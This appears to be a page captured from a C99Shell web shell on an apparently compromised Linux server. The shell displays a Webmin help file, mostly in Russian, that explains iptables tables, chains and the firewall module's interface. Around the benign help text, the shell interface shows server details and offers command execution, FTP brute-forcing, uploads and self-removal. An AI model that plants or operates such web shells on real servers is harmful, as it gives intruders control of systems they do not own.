!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t
 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/firewall6/help/   drwxr-xr-x
Free 3.75 GB of 27.03 GB (13.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     intro.ru.UTF-8.html (9.23 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Межсетевой экран Linux

Введение

Этот модуль позволяет вам конфигурировать функции брандмауэра IPtables имеющиеся в ядре Linux 2.4. В отличии от некоторых других программ конфигураторов, вместо того, чтобы создавать shell script для добавления правил брандмауэра, он считывает и редактирует файл сохраненный в формате, который считывается и записывается командами ipi(6)tables-restore и ipi(6)tables-save соответственно.

Если в вашей системе уже есть брандмауэр настроенный вручную или при помощи скрипта, модуль предложит конвертировать ваши настройки в IPtables-save файл, и создаст скрипт активирующий правила из этого файла при запуске системы. Однако, если Вы сделаете это, вы больше не будете редактировать вручную свой скрипт добавляющий правила в брандмауэр, и должны будете отключить его автозагрузку при старте системы.

Краткий обзор IPtables

Каждый входящий (Input), исходящий (Output) или перенаправляемый (Forward) сетевой пакет, проверяется одной или несколькими цепочками правил, для определения того, что с ним делать. Каждая цепочка может содержать несколько правил или может быть пустой. У каждого правила есть Условие (для указания того, какие пакеты будут обрабатываться этим правилом), и Действие (для указания того, что необходимо сделать с пакетом если он соответствует Условию). Если пакет не соответствует Условию, он перемещается дальше по цепочке к следующему правилу. Каждая цепочка правил имеет также "действие по-умолчанию", которое производится с пакетом достигшим конца цепочки.

Каждая цепочка является частью таблицы. Таблиц всего три:

  • Фильтрация пакетов (filter)
    Цепочки в этой таблице могут использоваться для управления информацией приходящей в вашу систему от других хостов в сети, отправляемой пользователями и процессами вашей системы, и перенаправляемой вашей системой, если она используется как маршрутизатор.

  • Преобразование сетевых адресов (nat)
    Эта таблица может быть использована для организации NAT или masquerading, которые понадобятся, если вы захотите предоставить пользователям внутренней сети доступ в интернет через один внешний IP-адрес.

  • Преобразование сетевых пакетов (mangle)
    Эта таблица используется для модификации пакетов отправляемых вашей системой, или перенаправляемых от других хостов в сети.

В дополнение к стандартным цепочкам, которые входят в каждую из таблиц, вы можете создать свои собственные Пользовательские цепочки. Их можно вкладываться в другие цепочки в пределах одной таблицы, и если пакет достигнет конца такой цепочки, пакет вернется в вызвавшую его цепочку и продолжит движение по ней. Пользовательские цепочки можно использовать для группировки часто повторяющихся правил (чтобы не повторять их по несколько раз, а просто пересылать пакет в соответствующую цепочку) или распределения пакетов отвечающих различным условиям по разным цепочкам (например, можно сделать для пакетов принадлежащих разным протоколам отдельные цепочки: чтобы UDP-пакеты не проходили через правила для TCP-пакетов и т.п) .

Главная страница

На главной странице этого модуля перечислены все цепочки и правила одной из доступных таблиц Iptables. Выбрать таблицу для отображения можно при помощи выпадающего меню в левом верхнем углу экрана. На странице находятся разделы, в каждом из которых отображается одна из цепочек текущей таблицы, с перечислением всех правил. В конце каждого раздела находятся кнопки, которые позволяют изменить Действие по-умолчанию для встроенных цепочек, и переименовать или удалить ранее созданные Пользовательские цепочки. Так же, там находятся кнопки для добавления, перемещения и удаления правил из цепочек. Создать новую Пользовательскую цепочку, можно при помощи кнопок в правом верхнем углу экрана.

Для каждого правила в списке цепочек, указано его Условие, Действие и Описание. Щелчком на любом из правил можно его отредактировать. Стрелки справа позволят переместить правило по цепочке вверх или вниз, а так же, сразу создать новое правило в необходимом месте цепочки. При попытке добавить или отредактировать правило, откроется новая страница на которой вы сможете выбрать Действие для правила, а так же Условие, при котором это Действие должно выполняться.

В самом низу главной страницы находятся несколько кнопок: Применить конфигурацию - активирует текущие настройки брандмауэра, загружая их в ядро командой ipi(6)tables-restore. Вернуть конфигурацию действует наоборот - загружает в окно для конфигурирования настройки, активные в данный момент в ядре. Включать при запуске позволяет настроить автозапуск брандмауэра (если поддерживается вашим дистрибутивом). Сбросить конфигурацию - очищает все цепочки и таблицы, чтобы начать настройку с нуля.

Filtering chains

For better collaboration with external iptables scripts you can exclude individual chains from the processing by the firewall. To do this, you must select direct processing of rules in the settings and enter a filter list, which excludes the appropriate chains from processing. Chains that are not exculded from editing are flagged with a "not managed by firewall" message.

IP Sets

Newer versions of ip(6)table support the ipset extension. IP sets are lists of IP addresses in the main memory, which can be searched very efficiently and used as a condition in rules. On the main page, existing IP sets that can be used by rules are displayed. Currently, however, it is not possible to manage these in the firewall.



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0033 ]--